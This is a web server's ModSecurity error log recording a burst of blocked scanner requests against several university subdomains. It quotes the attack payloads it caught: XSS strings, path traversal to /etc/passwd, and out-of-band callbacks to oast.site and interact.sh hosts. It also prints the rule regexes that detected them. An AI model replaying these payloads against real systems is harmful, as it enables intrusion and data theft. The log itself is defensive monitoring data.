[Tue Aug 29 11:55:53.816233 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqTvzQAAAAa"]
[Tue Aug 29 11:55:53.855417 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqeFeUAAAAx"]
[Tue Aug 29 11:55:53.869117 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0n633ctxeys8wm.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0n633ctxeys8wm.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqY6MQAAAAr"]
[Tue Aug 29 11:55:53.895502 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq4fZIAAAAJ"]
[Tue Aug 29 11:55:53.900676 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqeFecAAAAx"]
[Tue Aug 29 11:55:53.902464 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqTvzcAAAAa"]
[Tue Aug 29 11:55:53.926606 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq5@GsAAAAK"]
[Tue Aug 29 11:55:53.947562 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqY6McAAAAr"]
[Tue Aug 29 11:55:53.949299 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArC7asAAAAW"]
[Tue Aug 29 11:55:53.950592 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAq5@GwAAAAK"]
[Tue Aug 29 11:55:54.544601 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0btrm6hxwt3cf5.oast.site found within TX:1: cjmnijtjmimvgniikdb0btrm6hxwt3cf5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WsCo-f0AAAqqtksAAAAA"]
[Tue Aug 29 11:55:54.623466 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22onload=\\x22 found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WsCo-f0AAAolKy8AAAAe"]
[Tue Aug 29 11:55:54.628181 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WsCo-f0AAAq4fZcAAAAJ"]
[Tue Aug 29 11:55:55.641514 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09ae3yu84yeifh.oast.site/ found within TX:1: cjmnijtjmimvgniikdb09ae3yu84yeifh.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16W8Co-f0AAArB1ssAAAAV"]
[Tue Aug 29 11:55:55.669009 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqTvzwAAAAa"]
[Tue Aug 29 11:55:55.722345 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArC7bMAAAAW"]
[Tue Aug 29 11:55:55.723701 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqeFe4AAAAx"]
[Tue Aug 29 11:55:55.838348 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArC7bUAAAAW"]
[Tue Aug 29 11:55:55.839609 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArB1s8AAAAV"]
[Tue Aug 29 11:55:56.576495 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAArC7bcAAAAW"]
[Tue Aug 29 11:55:56.576540 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@HoAAAAK"]
[Tue Aug 29 11:55:56.577218 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqeFfEAAAAx"]
[Tue Aug 29 11:55:56.578441 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUrYAAAAh"]
[Tue Aug 29 11:55:56.611167 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq@sbcAAAAM"]
[Tue Aug 29 11:55:56.623371 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAArC7bkAAAAW"]
[Tue Aug 29 11:55:56.660206 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@H4AAAAK"]
[Tue Aug 29 11:55:56.674239 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06gg3p3hdypqcw.oast.site/ found within TX:1: cjmnijtjmimvgniikdb06gg3p3hdypqcw.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16XMCo-f0AAAqY6NMAAAAr"]
[Tue Aug 29 11:55:56.692613 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUroAAAAh"]
[Tue Aug 29 11:55:56.733416 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAq@sbwAAAAM"]
[Tue Aug 29 11:55:56.734392 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAApbUrwAAAAh"]
[Tue Aug 29 11:55:57.557183 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16XcCo-f0AAAqeFfoAAAAx"]
[Tue Aug 29 11:55:57.573177 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XcCo-f0AAAqTv0IAAAAa"]
